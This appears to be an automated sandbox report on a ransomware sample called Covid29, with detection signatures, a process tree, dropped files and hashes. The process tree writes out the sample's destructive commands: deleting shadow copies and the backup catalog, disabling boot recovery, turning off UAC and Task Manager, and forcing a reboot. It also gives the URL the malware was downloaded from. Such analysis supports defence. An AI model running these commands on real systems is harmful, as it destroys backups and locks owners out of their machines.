Resubmissions

20-12-2024 05:28

241220-f6e4as1qhk 10

06-12-2024 01:54

241206-cbzbxatpfz 10

Analysis

  • max time kernel
    79s
  • max time network
    69s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    20-12-2024 05:28

General

  • Target

    https://raw.githubusercontent.com/pankoza2-pl/malwaredatabase-old/53b7c902145cdf7b74223bb2dd18b8a96acd013a/Covid29-Ransomware/Covid29%20Ransomware.zip

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://raw.githubusercontent.com/pankoza2-pl/malwaredatabase-old/53b7c902145cdf7b74223bb2dd18b8a96acd013a/Covid29-Ransomware/Covid29%20Ransomware.zip
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0xdc,0xe0,0xd8,0xe4,0x7ff8a130cc40,0x7ff8a130cc4c,0x7ff8a130cc58
      2⤵
        PID:1608
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1812 /prefetch:2
        2⤵
          PID:1244
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2060,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
          2⤵
            PID:3772
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2380 /prefetch:8
            2⤵
              PID:4224
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
              2⤵
                PID:3512
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                2⤵
                  PID:4148
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:8
                  2⤵
                    PID:3648
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4080,i,6805160635874606871,3034028508497555304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:8
                    2⤵
                    • NTFS ADS
                    PID:1968
                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                  1⤵
                    PID:916
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                    1⤵
                      PID:3676
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:4792
                      • C:\Windows\system32\NOTEPAD.EXE
                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\readme.txt
                        1⤵
                          PID:2648
                        • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                          "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                          1⤵
                          • System Location Discovery: System Language Discovery
                          PID:1992
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2507.tmp\TrojanRansomCovid29.bat" "
                            2⤵
                            • System Location Discovery: System Language Discovery
                            • Modifies registry class
                            PID:1760
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2507.tmp\fakeerror.vbs"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:4636
                            • C:\Windows\SysWOW64\PING.EXE
                              ping localhost -n 2
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:4368
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:1208
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:1264
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:4168
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:4420
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:1460
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                              3⤵
                              • UAC bypass
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:3768
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              3⤵
                              • UAC bypass
                              • System Location Discovery: System Language Discovery
                              • Modifies registry key
                              PID:488
                            • C:\Users\Admin\AppData\Local\Temp\2507.tmp\mbr.exe
                              mbr.exe
                              3⤵
                              • Executes dropped EXE
                              • Writes to the Master Boot Record (MBR)
                              • System Location Discovery: System Language Discovery
                              PID:1996
                            • C:\Users\Admin\AppData\Local\Temp\2507.tmp\Cov29Cry.exe
                              Cov29Cry.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4992
                              • C:\Users\Admin\AppData\Roaming\svchost.exe
                                "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                4⤵
                                • Drops startup file
                                • Executes dropped EXE
                                • Drops desktop.ini file(s)
                                • Sets desktop wallpaper using registry
                                • Modifies registry class
                                • Suspicious behavior: AddClipboardFormatListener
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3424
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                  5⤵
                                    PID:3928
                                    • C:\Windows\system32\vssadmin.exe
                                      vssadmin delete shadows /all /quiet
                                      6⤵
                                      • Interacts with shadow copies
                                      PID:768
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic shadowcopy delete
                                      6⤵
                                        PID:692
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                      5⤵
                                        PID:2700
                                        • C:\Windows\system32\bcdedit.exe
                                          bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                          6⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:1224
                                        • C:\Windows\system32\bcdedit.exe
                                          bcdedit /set {default} recoveryenabled no
                                          6⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:4092
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                        5⤵
                                          PID:4332
                                          • C:\Windows\system32\wbadmin.exe
                                            wbadmin delete catalog -quiet
                                            6⤵
                                            • Deletes backup catalog
                                            PID:2068
                                        • C:\Windows\system32\NOTEPAD.EXE
                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                          5⤵
                                            PID:292
                                      • C:\Windows\SysWOW64\shutdown.exe
                                        shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3032
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping localhost -n 9
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:1240
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im explorer.exe
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:2548
                                      • C:\Users\Admin\AppData\Local\Temp\2507.tmp\Cov29LockScreen.exe
                                        Cov29LockScreen.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1224
                                  • C:\Windows\System32\PickerHost.exe
                                    C:\Windows\System32\PickerHost.exe -Embedding
                                    1⤵
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2180
                                  • C:\Windows\system32\vssvc.exe
                                    C:\Windows\system32\vssvc.exe
                                    1⤵
                                      PID:4784
                                    • C:\Windows\system32\wbengine.exe
                                      "C:\Windows\system32\wbengine.exe"
                                      1⤵
                                        PID:3580
                                      • C:\Windows\System32\vdsldr.exe
                                        C:\Windows\System32\vdsldr.exe -Embedding
                                        1⤵
                                          PID:4876
                                        • C:\Windows\System32\vds.exe
                                          C:\Windows\System32\vds.exe
                                          1⤵
                                          • Checks SCSI registry key(s)
                                          PID:720

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                          Filesize

                                          649B

                                          MD5

                                          c754a7a485165d4a72ed83d04574673f

                                          SHA1

                                          0b734e0d987a7a174ff7c3720013eeb6e93a71c9

                                          SHA256

                                          a995bb313feb9450b0f5822b048bfd131884551c93fde3ea55124112fc4755b3

                                          SHA512

                                          9607e20b099d733b79ce4aa323a27c10a3c9108439cc6cced5363912bd69ab263835f7dc1a10d0920685256384d872856cc89613a9fe854529de7e52363d2f08

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          1KB

                                          MD5

                                          5430f72588a9fac6c9ac25d92937c9c4

                                          SHA1

                                          5a92048c5de21d203f48c8f0015208e8e5b77440

                                          SHA256

                                          34d92277c4c2095ad1c1cced0e297f4fce3bb08d917372d93f28bd8fee2d885e

                                          SHA512

                                          5b1c15749776a9bc7ba35d13685bd885f5aac8debe7e2f87525297e2a69f4c9620dbd01a40bc34a9cab68497498eba6537fa582c10b0f8cf01f7a6142b4c088b

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          2KB

                                          MD5

                                          4f9b10faad4a5baec57218274b40ae91

                                          SHA1

                                          1aa288a4f5f6507e8c3dd30301ff546c5703feb5

                                          SHA256

                                          9776df5311f78716716d54c559af2d47bedc1fec6573ffec96d6e7db93690894

                                          SHA512

                                          c25ab2f080ca6493520dc7069c10994c37cfe08268048102e3ca7a94c3f72c9f3aa010e5f6eeb61b72932cdc52965df18a3169758e4340dc1215e9941ba25090

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                          MD5

                                          d751713988987e9331980363e24189ce

                                          SHA1

                                          97d170e1550eee4afc0af065b78cda302a97674c

                                          SHA256

                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                          SHA512

                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          524B

                                          MD5

                                          0466f05d81ed8ddba90a118588c2dc80

                                          SHA1

                                          6307c64ce65ece63c4ef2daf9c393df34d4ea0b3

                                          SHA256

                                          cbc616e42e13fac152d92f0094c01f8a5f5d485a47b9ef0bf4349467843d7430

                                          SHA512

                                          dbec45842f23a363638b6f748c8465d3ed08f00bb3321277bd7c60a76cabfc11c5750300281a87f1372f3cdb905cea900a2150f8fd1ded3520fe959d0ab6195e

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          57faaa493f8bb2b517543318b11f87fa

                                          SHA1

                                          f8a485c16b01eb80a74fb1be2d223fbb9ecf62d6

                                          SHA256

                                          faf23863550ca83d6dfd2aedba1f3bf0e5863a67dc788bd64c862df151b155fe

                                          SHA512

                                          713f3e79df7821a247888bb6df476a324bccd7fe3612f31dc74d8b75f75139899bba1e84d47247f3a870e83d269682a3fc0c15277cfc1cdf5c091d92ac70437a

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          c591ad3006da5487513ccd192aa8e674

                                          SHA1

                                          50f0692a05ca9d8181a740b2f8f2774726bc72d2

                                          SHA256

                                          562d6d3a86df736290e17f3bf101463667770a19590ecf8eaad79a6e866d82d6

                                          SHA512

                                          e8c8bf339f130f285e1972e5e84eabdbc131f81890ba34b4446f10966661faaad27fb7b691224a9213fe5770dac25e021b504dba542b1cbf7b65bdc99d58d74b

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          a87a21c6d54c2848ebe496901495000a

                                          SHA1

                                          d2e975194e71fa3ce56bef65bee461cab22c677e

                                          SHA256

                                          dd384b8344e3290af0bb91417c591b3f05fb44a1efa876f7316cdf38b40283a8

                                          SHA512

                                          aadce117c26b9080250263f6b26009d23de9e6f3763c4c86f31a85482ea9b04085754f8e4f4f611379c64ad2c3546c9f2ac329e5c129c6db1799d2c1f57b37db

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          3b6be08237adf1fe4c36a6e38db60a1d

                                          SHA1

                                          8ef3305f2dbdb81fa98c0884a79bf7a2a1cbc0f0

                                          SHA256

                                          c7c08c50f1cb874eec9e62c624edc9be51b7d4e4c4d4426d2ddc68ada90215ef

                                          SHA512

                                          cd92bb92375ae94dc1d11f10da49b399f4d0b672c559a9a1f3e12e9198afcbbc3cf9db3e41474d01544a0418180e72fa78d4ab70796677909cba89875ac65055

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          87a669290d9a2a9d1181a04b736911a9

                                          SHA1

                                          1a41a6a9b94ec923a51ed0665b4d35d0c4a14521

                                          SHA256

                                          3242c263d4b04d735644763cb13ffba6d0f81e2ef4577385add58ee652a3bd8f

                                          SHA512

                                          847f0aeaab5ddc8fc20f0d5fbd952c6186ae187d1b01230861dedd3137967457d4eeadbb508f804ec063abd2738d74ba4d56a18b5c8ca1f0639ffa22f40c71d0

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1

                                          Filesize

                                          264KB

                                          MD5

                                          c3c2ad547f95d851ed1aba61433e57c5

                                          SHA1

                                          1ad180580b30e965517d9a9d1f0518935ec58982

                                          SHA256

                                          d3df8306d2f82d84035d17c038299ec9d308e69aa5dce3d2cd4c9376433479a6

                                          SHA512

                                          139a0cdc4fe15ae01abab7b54f599faf812c0992c2e3da0810e9e6fbaec0e730d940f3915a6586c02c183ef3d33221396ff9061397e54cc28a980d0e8f8986bd

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          228KB

                                          MD5

                                          d709a0e1ac2c8117bd57fda166ddfc62

                                          SHA1

                                          a3006e4e8c1a42e634b25b5ba8b9b8d0baeae8d9

                                          SHA256

                                          9e7c7e6f7e2b3291e68ce7996c4a7f639b800623f5ff46f685f957e32ac9fe42

                                          SHA512

                                          ecc5b8f0dd36cf2c2c68f1ec8f6280c45402d61fa7b6d692dfeb603a4d34b9e3f59fa416fe265f861aed2baa51f9c9f0f8c694363ca23de5921b8cc002937593

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          228KB

                                          MD5

                                          c7025584ce7e46ddb6b78daa378dab52

                                          SHA1

                                          37a0c6ef6ada5eebd6235be62e2d80b0c2e77316

                                          SHA256

                                          a9eb74f99df2c07a416b58dbe9396e965aa0ec1751f04885805168fccced0bd1

                                          SHA512

                                          4cc5e6b47286c2aa9b92c11f81d8db67db21e42606f0f31385b88e304e89ed3ce5103e4a98503df8ed8ab1211b1490d76932a4ebbf152acc015af896626fe38c

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          228KB

                                          MD5

                                          387077353c01b80fb2399800e2348150

                                          SHA1

                                          fb7169974a211425299d47b96d9281f757737a72

                                          SHA256

                                          8593cd53ac0fc15dc825375dcfeefde455df9f4cbcc02222c764ed87737cb57e

                                          SHA512

                                          6ff60a64c6ed1e71f7a71d3cda1965a45919c016aa0da5f1f230220ef29c28e8f2f414ce60aa0513eb87b061ba4fe4e580c5380e58d3b62b0a189778da05fc0a

                                        • C:\Users\Admin\AppData\Local\Temp\2507.tmp\Cov29Cry.exe

                                          Filesize

                                          103KB

                                          MD5

                                          8bcd083e16af6c15e14520d5a0bd7e6a

                                          SHA1

                                          c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                          SHA256

                                          b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                          SHA512

                                          35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                        • C:\Users\Admin\AppData\Local\Temp\2507.tmp\Cov29LockScreen.exe

                                          Filesize

                                          48KB

                                          MD5

                                          f724c6da46dc54e6737db821f9b62d77

                                          SHA1

                                          e35d5587326c61f4d7abd75f2f0fc1251b961977

                                          SHA256

                                          6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                          SHA512

                                          6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                        • C:\Users\Admin\AppData\Local\Temp\2507.tmp\TrojanRansomCovid29.bat

                                          Filesize

                                          1KB

                                          MD5

                                          57f0432c8e31d4ff4da7962db27ef4e8

                                          SHA1

                                          d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                          SHA256

                                          b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                          SHA512

                                          bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                        • C:\Users\Admin\AppData\Local\Temp\2507.tmp\fakeerror.vbs

                                          Filesize

                                          144B

                                          MD5

                                          c0437fe3a53e181c5e904f2d13431718

                                          SHA1

                                          44f9547e7259a7fb4fe718e42e499371aa188ab6

                                          SHA256

                                          f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                          SHA512

                                          a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                        • C:\Users\Admin\AppData\Local\Temp\2507.tmp\mbr.exe.danger

                                          Filesize

                                          1.3MB

                                          MD5

                                          35af6068d91ba1cc6ce21b461f242f94

                                          SHA1

                                          cb054789ff03aa1617a6f5741ad53e4598184ffa

                                          SHA256

                                          9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                          SHA512

                                          136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                        • C:\Users\Admin\Desktop\covid29-is-here.txt

                                          Filesize

                                          861B

                                          MD5

                                          c53dee51c26d1d759667c25918d3ed10

                                          SHA1

                                          da194c2de15b232811ba9d43a46194d9729507f0

                                          SHA256

                                          dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                          SHA512

                                          da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                        • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                          Filesize

                                          1.7MB

                                          MD5

                                          272d3e458250acd2ea839eb24b427ce5

                                          SHA1

                                          fae7194da5c969f2d8220ed9250aa1de7bf56609

                                          SHA256

                                          bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                          SHA512

                                          d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                        • C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier

                                          Filesize

                                          26B

                                          MD5

                                          fbccf14d504b7b2dbcb5a5bda75bd93b

                                          SHA1

                                          d59fc84cdd5217c6cf74785703655f78da6b582b

                                          SHA256

                                          eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                          SHA512

                                          aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                        • memory/1992-175-0x0000000000400000-0x00000000005D5000-memory.dmp

                                          Filesize

                                          1.8MB

                                        • memory/1992-180-0x0000000000400000-0x00000000005D5000-memory.dmp

                                          Filesize

                                          1.8MB

                                        • memory/1992-69-0x0000000000400000-0x00000000005D5000-memory.dmp

                                          Filesize

                                          1.8MB

                                        • memory/1996-99-0x0000000000400000-0x00000000004D8000-memory.dmp

                                          Filesize

                                          864KB

                                        • memory/4992-102-0x0000000000100000-0x0000000000120000-memory.dmp

                                          Filesize

                                          128KB